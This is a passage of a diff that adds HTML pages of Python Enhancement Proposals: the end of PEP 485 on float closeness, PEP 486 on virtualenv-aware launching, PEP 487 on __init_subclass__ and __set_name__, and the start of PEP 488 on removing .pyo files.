It was suggested that comparing to zero is, in fact, a common use case +(evidence suggests that the numpy functions are often used with zero). +In this case, it would be desirable to have a “useful” default. Values +around 1e-8 were suggested, being about half of floating point +precision for values around 1.

+

However, to quote The Zen: “In the face of ambiguity, refuse the +temptation to guess.” Guessing that users will most often be concerned +with values close to 1.0 would lead to spurious passing tests when used +with smaller values – this is potentially more damaging than +requiring the user to thoughtfully select an appropriate value.

+
+
+
+

Expected Uses

+

The primary expected use case is various forms of testing – “are the +results computed near what I expect as a result?” This sort of test +may or may not be part of a formal unit testing suite. Such testing +could be used one-off at the command line, in an IPython notebook, as +part of doctests, or as simple asserts in an if __name__ == "__main__" +block.

+

It would also be an appropriate function to use for the termination +criteria for a simple iterative solution to an implicit function:

+
guess = something
+while True:
+    new_guess = implicit_function(guess, *args)
+    if isclose(new_guess, guess):
+        break
+    guess = new_guess
+
+
+
+

Inappropriate uses

+

One use case for floating point comparison is testing the accuracy of +a numerical algorithm. However, in this case, the numerical analyst +ideally would be doing careful error propagation analysis, and should +understand exactly what to test for. It is also likely that ULP (Unit +in the Last Place) comparison may be called for. While this function +may prove useful in such situations, it is not intended to be used in +that way without careful consideration.

+
+
+
+

Other Approaches

+
+

unittest.TestCase.assertAlmostEqual

+

(https://docs.python.org/3/library/unittest.html#unittest.TestCase.assertAlmostEqual)

+

Tests that values are approximately (or not approximately) equal by +computing the difference, rounding to the given number of decimal +places (default 7), and comparing to zero.

+

This method is purely an absolute tolerance test, and does not address +the need for a relative tolerance test.

+
+
+

numpy isclose()

+

http://docs.scipy.org/doc/numpy-dev/reference/generated/numpy.isclose.html

+

The numpy package provides the vectorized functions isclose() and +allclose(), for similar use cases as this proposal:

+

isclose(a, b, rtol=1e-05, atol=1e-08, equal_nan=False)

+
+
Returns a boolean array where two arrays are element-wise equal +within a tolerance.

The tolerance values are positive, typically very small numbers. +The relative difference (rtol * abs(b)) and the absolute +difference atol are added together to compare against the +absolute difference between a and b.

+
+

In this approach, the absolute and relative tolerances are added +together, rather than ORed together as in this proposal. This is +computationally simpler, and if the relative tolerance is larger than +the absolute tolerance, the addition will have little effect. However, +if the absolute and relative tolerances are of similar magnitude, then +the allowed difference will be about twice as large as expected.

+

This makes the function harder to understand, with no computational +advantage in this context.

+

Even more critically, if the values passed in are small compared to +the absolute tolerance, then the relative tolerance will be +completely swamped, perhaps unexpectedly.
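
+

For example, with numpy's defaults (rtol=1e-05, atol=1e-08):

+
import numpy as np
+
+# The relative difference here is 100%, but |a - b| = 1e-10 is far
+# below the default atol of 1e-8, so the values compare as "close".
+print(np.isclose(1e-10, 2e-10))  # True
+
+
+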

+

This is why, in this proposal, the absolute tolerance defaults to zero +– the user will be required to choose a value appropriate for the +values at hand.

+
+
+

Boost floating-point comparison

+

The Boost project ( [3] ) provides a floating point comparison +function. It is a symmetric approach, with both “weak” (larger of the +two relative errors) and “strong” (smaller of the two relative errors) +options. This proposal uses the Boost “weak” approach. There is no +need to complicate the API by providing the option to select different +methods when the results will be similar in most cases, and the user +is unlikely to know which to select in any case.

+
+
+

Alternate Proposals

+
+

A Recipe

+

The primary alternate proposal was to not provide a standard library +function at all, but rather, provide a recipe for users to refer to. +This would have the advantage that the recipe could provide and +explain the various options, and let the user select that which is +most appropriate. However, that would require anyone needing such a +test to, at the very least, copy the function into their code base, +and select the comparison method to use.

+
+
+

zero_tol

+

One possibility was to provide a zero tolerance parameter, rather than +the absolute tolerance parameter. This would be an absolute tolerance +that would only be applied in the case of one of the arguments being +exactly zero. This would have the advantage of retaining the full +relative tolerance behavior for all non-zero values, while allowing +tests against zero to work. However, it would also result in the +potentially surprising result that a small value could be “close” to +zero, but not “close” to an even smaller value. e.g., 1e-10 is “close” +to zero, but not “close” to 1e-11.

+
+
+

No absolute tolerance

+

Given the issues with comparing to zero, another possibility would +have been to only provide a relative tolerance, and let comparison to +zero fail. In this case, the user would need to do a simple absolute +test: abs(val) < zero_tol in the case where the comparison involved +zero.

+

However, this would not allow the same call to be used for a sequence +of values, such as in a loop or comprehension, making the function far +less useful. It is noted that the default abs_tol=0.0 achieves the +same effect if the default is not overridden.

+
+
+

Other tests

+

The other tests considered are all discussed in the Relative Error +section above.

+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0485.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0486/index.html b/pep-0486/index.html new file mode 100644 index 00000000000..7a6b8d0e604 --- /dev/null +++ b/pep-0486/index.html @@ -0,0 +1,251 @@ + + + + + + + + PEP 486 – Make the Python Launcher aware of virtual environments | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 486 – Make the Python Launcher aware of virtual environments

+
+
Author:
+
Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Feb-2015
+
Python-Version:
+
3.5
+
Post-History:
+
12-Feb-2015
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The Windows installers for Python include a launcher that locates the +correct Python interpreter to run (see PEP 397). However, the +launcher is not aware of virtual environments (virtualenv [1] or PEP +405 based), and so cannot be used to run commands from the active +virtualenv.

+

This PEP proposes making the launcher “virtualenv aware”. This means +that when run without specifying an explicit Python interpreter to +use, the launcher will use the currently active virtualenv, if any, +before falling back to the configured default Python.

+
+
+

Rationale

+

Windows users with multiple copies of Python installed need a means of +selecting which one to use. The Python launcher provides this +facility via a py command that can be used to run either a +configured “default” Python or a specific interpreter, selected by +command line arguments. So typical usage would be:

+
# Run the Python interactive interpreter
+py
+
+# Execute an installed module
+py -m pip install pytest
+py -m pytest
+
+
+

When using virtual environments, the py launcher is unaware that a +virtualenv is active, and will continue to use the system Python. So +different command invocations are needed to run the same commands in a +virtualenv:

+
# Run the Python interactive interpreter
+python
+
+# Execute an installed module (these could use python -m,
+# which is longer to type but is a little more similar to the
+# launcher approach)
+pip install pytest
+py.test
+
+
+

Having to use different commands is error-prone, and in many cases +the error is difficult to spot immediately. The PEP proposes making +the py command usable with virtual environments, so that the first +form of command can be used in all cases.

+
+
+

Implementation

+

Both virtualenv and the core venv module set an environment +variable VIRTUAL_ENV when activating a virtualenv. This PEP +proposes that the launcher checks for the VIRTUAL_ENV environment +variable whenever it would run the “default” Python interpreter for +the system (i.e., when no specific version flags such as py -2.7 +are used) and if present, run the Python interpreter for the +virtualenv rather than the default system Python.
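
+

A hypothetical sketch of that selection logic, expressed in Python (the real launcher is written in C, and the helper name python_to_run is invented here):

+
import os
+
+def python_to_run(explicit_version=None, configured_default='python.exe'):
+    if explicit_version is not None:
+        # An explicit version (e.g. "py -2.7") always wins, as today.
+        return 'python{}.exe'.format(explicit_version)
+    venv = os.environ.get('VIRTUAL_ENV')
+    if venv:
+        # An active virtualenv takes precedence over the default.
+        return os.path.join(venv, 'Scripts', 'python.exe')
+    return configured_default
+
+
+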

+

The “default” Python interpreter referred to above is (as per PEP 397) +either the latest version of Python installed on the system, or +a version configured via the py.ini configuration file. When the +user specifies an explicit Python version on the command line, this +will always be used (as at present).

+
+
+

Impact on Script Launching

+

As well as interactive use, the launcher is used as the Windows file +association for Python scripts. In that case, a “shebang” (#!) +line at the start of the script is used to identify the interpreter to +run. A fully-qualified path can be used, or a version-specific Python +(python3 or python2, or even python3.5), or the generic +python, which means to use the default interpreter.

+

The launcher also looks for the specific shebang line +#!/usr/bin/env python. On Unix, the env program searches for a +command on $PATH and runs the command so located. Similarly, with +this shebang line, the launcher will look for a copy of python.exe +on the user’s current %PATH% and will run that copy.

+

As activating a virtualenv means that it is added to PATH, no +special handling is needed to run scripts with the active virtualenv - +they just need to use the #!/usr/bin/env python shebang line, +exactly as on Unix. (If there is no activated virtualenv, and no +python.exe on PATH, the launcher will look for a default +Python exactly as if the shebang line had said #!python).
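
+

For example, a script saved with that shebang line reports whichever interpreter was selected:

+
#!/usr/bin/env python
+import sys
+
+# With an activated virtualenv (its Scripts directory is on PATH),
+# this prints the virtualenv's interpreter; otherwise the default.
+print(sys.executable)
+
+
+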

+
+
+

Exclusions

+

The PEP makes no attempt to promote the use of the launcher for +running Python on Windows. Most existing documentation assumes the +use of python as the command to run Python, and (for example) +pip to run an installed Python command. This documentation is not +expected to change, and users who choose to manage their PATH +environment variable can continue to use this form. The focus of this +PEP is purely on allowing users who prefer to use the launcher when +dealing with their system Python installations, to be able to continue +to do so when using virtual environments.

+
+
+

Reference Implementation

+

A patch implementing the proposed behaviour is available at +http://bugs.python.org/issue23465

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0486.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0487/index.html b/pep-0487/index.html new file mode 100644 index 00000000000..152773eae7c --- /dev/null +++ b/pep-0487/index.html @@ -0,0 +1,579 @@ + + + + + + + + PEP 487 – Simpler customisation of class creation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 487 – Simpler customisation of class creation

+
+
Author:
+
Martin Teichmann <lkb.teichmann at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Feb-2015
+
Python-Version:
+
3.6
+
Post-History:
+
27-Feb-2015, 05-Feb-2016, 24-Jun-2016, 02-Jul-2016, 13-Jul-2016
+
Replaces:
+
422
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Currently, customising class creation requires the use of a custom metaclass. +This custom metaclass then persists for the entire lifecycle of the class, +creating the potential for spurious metaclass conflicts.

+

This PEP proposes to instead support a wide range of customisation +scenarios through a new __init_subclass__ hook in the class body, +and a hook to initialize attributes.

+

The new mechanism should be easier to understand and use than +implementing a custom metaclass, and thus should provide a gentler +introduction to the full power of Python’s metaclass machinery.

+
+
+

Background

+

Metaclasses are a powerful tool to customize class creation. They have, +however, the problem that there is no automatic way to combine metaclasses. +If one wants to use two metaclasses for a class, a new metaclass combining +those two needs to be created, typically manually.

+

This need often occurs as a surprise to a user: inheriting from two base +classes coming from two different libraries suddenly raises the necessity +to manually create a combined metaclass, where typically one is not +interested in those details about the libraries at all. This becomes +even worse if one library starts to make use of a metaclass which it +has not done before. While the library itself continues to work perfectly, +suddenly every code combining those classes with classes from another library +fails.

+
+
+

Proposal

+

While there are many possible ways to use a metaclass, the vast majority +of use cases falls into just three categories: some initialization code +running after class creation, the initialization of descriptors and +keeping the order in which class attributes were defined.

+

The first two categories can easily be achieved by having simple hooks +into the class creation:

+
    +
  1. An __init_subclass__ hook that initializes +all subclasses of a given class.
  +
  2. upon class creation, a __set_name__ hook is called on all the +attributes (descriptors) defined in the class.
  +
+

The third category is the topic of another PEP, PEP 520.

+

As an example, the first use case looks as follows:

+
>>> class QuestBase:
+...    # this is implicitly a @classmethod (see below for motivation)
+...    def __init_subclass__(cls, swallow, **kwargs):
+...        cls.swallow = swallow
+...        super().__init_subclass__(**kwargs)
+
+>>> class Quest(QuestBase, swallow="african"):
+...    pass
+
+>>> Quest.swallow
+'african'
+
+
+

The base class object contains an empty __init_subclass__ +method which serves as an endpoint for cooperative multiple inheritance. +Note that this method has no keyword arguments, meaning that all +methods which are more specialized have to process all keyword +arguments.

+

This general proposal is not a new idea (it was first suggested for +inclusion in the language definition more than 10 years ago, and a +similar mechanism has long been supported by Zope’s ExtensionClass), +but the situation has changed sufficiently in recent years that +the idea is worth reconsidering for inclusion.

+

The second part of the proposal adds a __set_name__ +initializer for class attributes, especially if they are descriptors. +Descriptors are defined in the body of a +class, but they do not know anything about that class; they do not +even know the name they are accessed with. They do get to know their +owner once __get__ is called, but they still do not know their +name. This is unfortunate: for example, they cannot put their +associated value into their object’s __dict__ under their name, +since they do not know that name. This problem has been solved many +times, and is one of the most important reasons to have a metaclass in +a library. While it would be easy to implement such a mechanism using +the first part of the proposal, it makes sense to have one solution +for this problem for everyone.

+

To give an example of its usage, imagine a descriptor representing weak +referenced values:

+
import weakref
+
+class WeakAttribute:
+    def __get__(self, instance, owner):
+        return instance.__dict__[self.name]()
+
+    def __set__(self, instance, value):
+        instance.__dict__[self.name] = weakref.ref(value)
+
+    # this is the new initializer:
+    def __set_name__(self, owner, name):
+        self.name = name
+
+
+

Such a WeakAttribute may, for example, be used in a tree structure +where one wants to avoid cyclic references via the parent:

+
class TreeNode:
+    parent = WeakAttribute()
+
+    def __init__(self, parent):
+        self.parent = parent
+
+
+

Note that the parent attribute is used like a normal attribute, +yet the tree contains no cyclic references and can thus be easily +garbage collected when out of use. The parent attribute magically +becomes None once the parent ceases to exist.

+

While this example looks very trivial, it should be noted that until +now such an attribute could not be defined without the use of a metaclass. +And given that such a metaclass can make life very hard, this kind of +attribute does not exist yet.

+

Initializing descriptors could simply be done in the +__init_subclass__ hook. But this would mean that descriptors can +only be used in classes that have the proper hook, the generic version +like in the example would not work generally. One could also call +__set_name__ from within the base implementation of +object.__init_subclass__. But given that it is a common mistake +to forget to call super(), it would happen too often that suddenly +descriptors are not initialized.

+
+
+

Key Benefits

+
+

Easier inheritance of definition time behaviour

+

Understanding Python’s metaclasses requires a deep understanding of +the type system and the class construction process. This is legitimately +seen as challenging, due to the need to keep multiple moving parts (the code, +the metaclass hint, the actual metaclass, the class object, instances of the +class object) clearly distinct in your mind. Even when you know the rules, +it’s still easy to make a mistake if you’re not being extremely careful.

+

Understanding the proposed implicit class initialization hook only requires +ordinary method inheritance, which isn’t quite as daunting a task. The new +hook provides a more gradual path towards understanding all of the phases +involved in the class definition process.

+
+
+

Reduced chance of metaclass conflicts

+

One of the big issues that makes library authors reluctant to use metaclasses +(even when they would be appropriate) is the risk of metaclass conflicts. +These occur whenever two unrelated metaclasses are used by the desired +parents of a class definition. This risk also makes it very difficult to +add a metaclass to a class that has previously been published without one.

+

By contrast, adding an __init_subclass__ method to an existing type poses +a similar level of risk to adding an __init__ method: technically, there +is a risk of breaking poorly implemented subclasses, but when that occurs, +it is recognised as a bug in the subclass rather than the library author +breaching backwards compatibility guarantees.

+
+
+
+

New Ways of Using Classes

+
+

Subclass registration

+

Especially when writing a plugin system, one likes to register new +subclasses of a plugin baseclass. This can be done as follows:

+
class PluginBase:
+    subclasses = []
+
+    def __init_subclass__(cls, **kwargs):
+        super().__init_subclass__(**kwargs)
+        cls.subclasses.append(cls)
+
+
+

In this example, PluginBase.subclasses will contain a plain list of all +subclasses in the entire inheritance tree. One should note that this also +works nicely as a mixin class.
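
+

Usage is then plain subclassing; note that the hook runs only for subclasses, so PluginBase itself is not registered:

+
class PluginA(PluginBase):
+    pass
+
+class PluginB(PluginA):
+    pass
+
+assert PluginBase.subclasses == [PluginA, PluginB]
+
+
+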

+
+
+

Trait descriptors

+

There are many designs of Python descriptors in the wild which, for +example, check boundaries of values. Often those “traits” need some support +of a metaclass to work. This is how this would look with this +PEP:

+
class Trait:
+    def __init__(self, minimum, maximum):
+        self.minimum = minimum
+        self.maximum = maximum
+
+    def __get__(self, instance, owner):
+        return instance.__dict__[self.key]
+
+    def __set__(self, instance, value):
+        if self.minimum < value < self.maximum:
+            instance.__dict__[self.key] = value
+        else:
+            raise ValueError("value not in range")
+
+    def __set_name__(self, owner, name):
+        self.key = name
+
+
+
+
+
+

Implementation Details

+

The hooks are called in the following order: type.__new__ calls +the __set_name__ hooks on the descriptors after the new class has been +initialized. Then it calls __init_subclass__ on the base class (on +super(), to be precise). This means that subclass initializers already +see the fully initialized descriptors. This way, __init_subclass__ users +can fix all descriptors again if this is needed.

+

Another option would have been to call __set_name__ in the base +implementation of object.__init_subclass__. This way it would be possible +even to prevent __set_name__ from being called. Most of the time, +however, such a prevention would be accidental, as it often happens that a call +to super() is forgotten.

+

As a third option, all the work could have been done in type.__init__. +Most metaclasses do their work in __new__, as this is recommended by +the documentation. Many metaclasses modify their arguments before they +pass them over to super().__new__. For compatibility with those kind +of classes, the hooks should be called from __new__.

+

Another small change should be done: in the current implementation of +CPython, type.__init__ explicitly forbids the use of keyword arguments, +while type.__new__ allows for its attributes to be shipped as keyword +arguments. This is weirdly incoherent, and thus it should be forbidden. +While it would be possible to retain the current behavior, it would be better +if this were fixed, as it is probably not used at all: the only use case would +be that a metaclass calls its super().__new__ with name, bases and +dict (yes, dict, not namespace or ns as mostly used with modern +metaclasses) as keyword arguments. This should not be done. This little +change simplifies the implementation of this PEP significantly, while +improving the coherence of Python overall.

+

As a second change, the new type.__init__ just ignores keyword +arguments. Currently, it insists that no keyword arguments are given. This +leads to a (wanted) error if one gives keyword arguments to a class declaration +if the metaclass does not process them. Metaclass authors that do want to +accept keyword arguments must filter them out by overriding __init__.

+

In the new code, it is not __init__ that complains about keyword arguments, +but __init_subclass__, whose default implementation takes no arguments. In +a classical inheritance scheme using the method resolution order, each +__init_subclass__ may take out its keyword arguments until none are left, +which is checked by the default implementation of __init_subclass__.
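
+

For example (with invented class names), each __init_subclass__ in the method resolution order consumes its own keyword and forwards the rest:

+
class Flavoured:
+    def __init_subclass__(cls, flavour=None, **kwargs):
+        cls.flavour = flavour
+        super().__init_subclass__(**kwargs)  # forward the rest up the MRO
+
+class Sized:
+    def __init_subclass__(cls, size=0, **kwargs):
+        cls.size = size
+        super().__init_subclass__(**kwargs)
+
+class Cake(Flavoured, Sized, flavour='lemon', size=3):
+    pass
+
+# A keyword that no class consumes reaches the default
+# object.__init_subclass__, which raises TypeError.
+
+
+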

+

For readers who prefer reading Python over English, this PEP proposes to +replace the current type and object with the following:

+
class NewType(type):
+    def __new__(cls, *args, **kwargs):
+        if len(args) != 3:
+            return super().__new__(cls, *args)
+        name, bases, ns = args
+        init = ns.get('__init_subclass__')
+        if isinstance(init, types.FunctionType):
+            ns['__init_subclass__'] = classmethod(init)
+        self = super().__new__(cls, name, bases, ns)
+        for k, v in self.__dict__.items():
+            func = getattr(v, '__set_name__', None)
+            if func is not None:
+                func(self, k)
+        super(self, self).__init_subclass__(**kwargs)
+        return self
+
+    def __init__(self, name, bases, ns, **kwargs):
+        super().__init__(name, bases, ns)
+
+class NewObject(object):
+    @classmethod
+    def __init_subclass__(cls):
+        pass
+
+
+
+
+

Reference Implementation

+

The reference implementation for this PEP is attached to +issue 27366.

+
+
+

Backward compatibility issues

+

The exact calling sequence in type.__new__ is slightly changed, raising +fears of backwards compatibility. It should be assured by tests that common use +cases behave as desired.

+

The following class definitions (except the one defining the metaclass) +continue to fail with a TypeError as superfluous class arguments are passed:

+
class MyMeta(type):
+    pass
+
+class MyClass(metaclass=MyMeta, otherarg=1):
+    pass
+
+MyMeta("MyClass", (), otherargs=1)
+
+import types
+types.new_class("MyClass", (), dict(metaclass=MyMeta, otherarg=1))
+types.prepare_class("MyClass", (), dict(metaclass=MyMeta, otherarg=1))
+
+
+

A metaclass defining only a __new__ method which is interested in keyword +arguments now does not need to define an __init__ method anymore, as the +default type.__init__ ignores keyword arguments. This is nicely in line +with the recommendation to override __new__ in metaclasses instead of +__init__. The following code does not fail anymore:

+
class MyMeta(type):
+    def __new__(cls, name, bases, namespace, otherarg):
+        return super().__new__(cls, name, bases, namespace)
+
+class MyClass(metaclass=MyMeta, otherarg=1):
+    pass
+
+
+

Only defining an __init__ method in a metaclass continues to fail with +TypeError if keyword arguments are given:

+
class MyMeta(type):
+    def __init__(self, name, bases, namespace, otherarg):
+        super().__init__(name, bases, namespace)
+
+class MyClass(metaclass=MyMeta, otherarg=1):
+    pass
+
+
+

Defining both __init__ and __new__ continues to work fine.

+

About the only thing that stops working is passing the arguments of +type.__new__ as keyword arguments:

+
class MyMeta(type):
+    def __new__(cls, name, bases, namespace):
+        return super().__new__(cls, name=name, bases=bases,
+                               dict=namespace)
+
+class MyClass(metaclass=MyMeta):
+    pass
+
+
+

This will now raise TypeError, but this is weird code, and easy +to fix even if someone used this feature.

+
+
+

Rejected Design Options

+
+

Calling the hook on the class itself

+

Adding an __autodecorate__ hook that would be called on the class itself was the idea proposed in PEP 422. Most examples work the same way or even better if the hook is called only on strict subclasses. In general, it is much easier to arrange an explicit call of the hook on the class in which it is defined (to opt in to such behavior) than to opt out (by remembering to check for cls is __class__ in the hook body) when one does not want the hook to be called on the class it is defined in.
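A hedged sketch of that opt-out burden under the rejected hook semantics (the hook name and guard are hypothetical, since the accepted design never calls the hook on the defining class):

class Base:
    @classmethod
    def __autodecorate__(cls, **kwargs):
        # Hypothetical PEP 422-style hook that would also run for Base itself.
        if cls is Base:
            return  # every hook body would need this opt-out guard
        ...  # per-subclass setup would go here

The accepted design avoids this entirely by never invoking the hook on the class that defines it.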

+

This becomes most evident if the class in question is designed as a +mixin: it is very unlikely that the code of the mixin is to be +executed for the mixin class itself, as it is not supposed to be a +complete class on its own.

+

The original proposal also made major changes in the class +initialization process, rendering it impossible to back-port the +proposal to older Python versions.

+

When it’s desired to also call the hook on the base class, two mechanisms are available:

+
  1. Introduce an additional mixin class just to hold the __init_subclass__ implementation. The original “base” class can then list the new mixin as its first parent class (a sketch follows this list).
  2. Implement the desired behaviour as an independent class decorator, and apply that decorator explicitly to the base class, and then implicitly to subclasses via __init_subclass__.
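A minimal runnable sketch of the first mechanism (the registry is an invented stand-in for whatever behaviour the hook implements):

registry = []

class InitHook:
    # Mixin that exists only to hold the __init_subclass__ implementation.
    def __init_subclass__(cls, **kwargs):
        super().__init_subclass__(**kwargs)
        registry.append(cls)

class Base(InitHook):
    # Base is itself a strict subclass of InitHook, so the hook
    # now runs for Base as well as for Base's own subclasses.
    pass

assert Base in registry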

Calling __init_subclass__ explicitly from a class decorator will generally be +undesirable, as this will also typically call __init_subclass__ a second time on +the parent class, which is unlikely to be desired behaviour.

+
+
+

Other variants of calling the hooks

+

Other names for the hook were presented, namely __decorate__ or +__autodecorate__. This proposal opts for __init_subclass__ as +it is very close to the __init__ method, just for the subclass, +while it is not very close to decorators, as it does not return the +class.

+

For the __set_name__ hook other names have been proposed as well, +__set_owner__, __set_ownership__ and __init_descriptor__.

+
+
+

Requiring an explicit decorator on __init_subclass__

+

One could require the explicit use of @classmethod on the __init_subclass__ method. It was made implicit since there’s no sensible interpretation for leaving it out, and that case would need to be detected anyway in order to give a useful error message.

+

This decision was reinforced after noticing that the user experience of +defining __prepare__ and forgetting the @classmethod method +decorator is singularly incomprehensible (particularly since PEP 3115 +documents it as an ordinary method, and the current documentation doesn’t +explicitly say anything one way or the other).

+
+
+

A more __new__-like hook

+

In PEP 422 the hook worked more like the __new__ method than the +__init__ method, meaning that it returned a class instead of +modifying one. This allows a bit more flexibility, but at the cost +of much harder implementation and undesired side effects.

+
+
+

Adding a class attribute with the attribute order

+

This got its own PEP 520.

+
+
+
+

History

+

This used to be a competing proposal to PEP 422 by Alyssa Coghlan and Daniel Urban. PEP 422 intended to achieve the same goals as this PEP, but with a different implementation strategy. In the meantime, PEP 422 has been withdrawn in favour of this approach.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0487.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0488/index.html b/pep-0488/index.html new file mode 100644 index 00000000000..2dfaee8af2b --- /dev/null +++ b/pep-0488/index.html @@ -0,0 +1,465 @@ PEP 488 – Elimination of PYO files | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 488 – Elimination of PYO files

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Feb-2015
+
Python-Version:
+
3.5
+
Post-History:
+
06-Mar-2015, +13-Mar-2015, +20-Mar-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes eliminating the concept of PYO files from Python. To continue supporting the separation of bytecode files by optimization level, this PEP proposes extending the PYC file name to include the optimization level in the bytecode repository directory when optimizations are applied.

+
+
+

Rationale

+

As of today, bytecode files come in two flavours: PYC and PYO. A PYC +file is the bytecode file generated and read from when no +optimization level is specified at interpreter startup (i.e., -O +is not specified). A PYO file represents the bytecode file that is +read/written when any optimization level is specified (i.e., when +-O or -OO is specified). This means that while PYC +files clearly delineate the optimization level used when they were +generated – namely no optimizations beyond the peepholer – the same +is not true for PYO files. To put this in terms of optimization +levels and the file extension:

+
    +
  • 0: .pyc
  • +
  • 1 (-O): .pyo
  • +
  • 2 (-OO): .pyo
  • +
+

The reuse of the .pyo file extension for both level 1 and 2 +optimizations means that there is no clear way to tell what +optimization level was used to generate the bytecode file. In terms +of reading PYO files, this can lead to an interpreter using a mixture +of optimization levels with its code if the user was not careful to +make sure all PYO files were generated using the same optimization +level (typically done by blindly deleting all PYO files and then +using the compileall module to compile all-new PYO files [1]). +This issue is only compounded when people optimize Python code beyond +what the interpreter natively supports, e.g., using the astoptimizer +project [2].

+

In terms of writing PYO files, the need to delete all PYO files +every time one either changes the optimization level they want to use +or are unsure of what optimization was used the last time PYO files +were generated leads to unnecessary file churn. The change proposed +by this PEP also allows for all optimization levels to be +pre-compiled for bytecode files ahead of time, something that is +currently impossible thanks to the reuse of the .pyo file +extension for multiple optimization levels.

+

As for distributing bytecode-only modules, having to distribute both +.pyc and .pyo files is unnecessary for the common use-case +of code obfuscation and smaller file deployments. This means that +bytecode-only modules will only load from their non-optimized +.pyc file name.

+
+
+

Proposal

+

To eliminate the ambiguity that PYO files present, this PEP proposes +eliminating the concept of PYO files and their accompanying .pyo +file extension. To allow for the optimization level to be unambiguous +as well as to avoid having to regenerate optimized bytecode files +needlessly in the __pycache__ directory, the optimization level +used to generate the bytecode file will be incorporated into the +bytecode file name. When no optimization level is specified, the +pre-PEP .pyc file name will be used (i.e., no optimization level +will be specified in the file name). For example, a source file named +foo.py in CPython 3.5 could have the following bytecode files +based on the interpreter’s optimization level (none, -O, and +-OO):

+
    +
  • 0: foo.cpython-35.pyc (i.e., no change)
  • +
  • 1: foo.cpython-35.opt-1.pyc
  • +
  • 2: foo.cpython-35.opt-2.pyc
  • +
+

Currently bytecode file names are created by +importlib.util.cache_from_source(), approximately using the +following expression defined by PEP 3147 [3], [4]:

+
'{name}.{cache_tag}.pyc'.format(name=module_name,
+                                cache_tag=sys.implementation.cache_tag)
+
+
+

This PEP proposes to change the expression when an optimization +level is specified to:

+
'{name}.{cache_tag}.opt-{optimization}.pyc'.format(
+        name=module_name,
+        cache_tag=sys.implementation.cache_tag,
+        optimization=str(sys.flags.optimize))
+
+
+

The “opt-” prefix was chosen so as to provide a visual separator +from the cache tag. The placement of the optimization level after +the cache tag was chosen to preserve lexicographic sort order of +bytecode file names based on module name and cache tag which will +not vary for a single interpreter. The “opt-” prefix was chosen over +“o” so as to be somewhat self-documenting. The “opt-” prefix was +chosen over “O” so as to not have any confusion in case “0” was the +leading prefix of the optimization level.

+

A period was chosen over a hyphen as a separator so as to distinguish +clearly that the optimization level is not part of the interpreter +version as specified by the cache tag. It also lends to the use of +the period in the file name to delineate semantically different +concepts.

+

For example, if -OO had been passed to the interpreter then +instead of importlib.cpython-35.pyo the file name would be +importlib.cpython-35.opt-2.pyc.

+

Leaving out the new opt- tag when no optimization level is applied should increase backwards compatibility. This is also more accommodating of Python implementations which have no use for optimization levels (e.g., PyPy [10]).

+

It should be noted that this change in no way affects the performance +of import. Since the import system looks for a single bytecode file +based on the optimization level of the interpreter already and +generates a new bytecode file if it doesn’t exist, the introduction +of potentially more bytecode files in the __pycache__ directory +has no effect in terms of stat calls. The interpreter will continue +to look for only a single bytecode file based on the optimization +level and thus no increase in stat calls will occur.

+

The only potentially negative result of this PEP is the probable +increase in the number of .pyc files and thus increase in storage +use. But for platforms where this is an issue, +sys.dont_write_bytecode exists to turn off bytecode generation so +that it can be controlled offline.

+
+
+

Implementation

+

An implementation of this PEP is available [11].

+
+

importlib

+

As importlib.util.cache_from_source() is the API that exposes +bytecode file paths as well as being directly used by importlib, it +requires the most critical change. As of Python 3.4, the function’s +signature is:

+
importlib.util.cache_from_source(path, debug_override=None)
+
+
+

This PEP proposes changing the signature in Python 3.5 to:

+
importlib.util.cache_from_source(path, debug_override=None, *, optimization=None)
+
+
+

The introduced optimization keyword-only parameter will control +what optimization level is specified in the file name. If the +argument is None then the current optimization level of the +interpreter will be assumed (including no optimization). Any argument +given for optimization will be passed to str() and must have +str.isalnum() be true, else ValueError will be raised (this +prevents invalid characters being used in the file name). If the +empty string is passed in for optimization then the addition of +the optimization will be suppressed, reverting to the file name +format which predates this PEP.
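As a concrete illustration (results shown for a hypothetical CPython 3.5 interpreter; the cache tag varies with the version actually running):

import importlib.util

importlib.util.cache_from_source('/src/foo.py', optimization='')
# -> '/src/__pycache__/foo.cpython-35.pyc'
importlib.util.cache_from_source('/src/foo.py', optimization=2)
# -> '/src/__pycache__/foo.cpython-35.opt-2.pyc'
# optimization='!' would raise ValueError, as '!' is not alphanumeric.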

+

It is expected that beyond Python’s own two optimization levels, third-party code will use a hash of optimization names to specify the optimization level, e.g. hashlib.sha256(','.join(['no dead code', 'const folding']).encode()).hexdigest(). While this might lead to long file names, it is assumed that most users never look at the contents of the __pycache__ directory and so this won’t be an issue.
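Spelled out as runnable code (the optimization names are the PEP’s own examples):

import hashlib
import importlib.util

names = ['no dead code', 'const folding']
tag = hashlib.sha256(','.join(names).encode('utf-8')).hexdigest()
# The 64-character hex digest satisfies str.isalnum().
importlib.util.cache_from_source('foo.py', optimization=tag)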

+

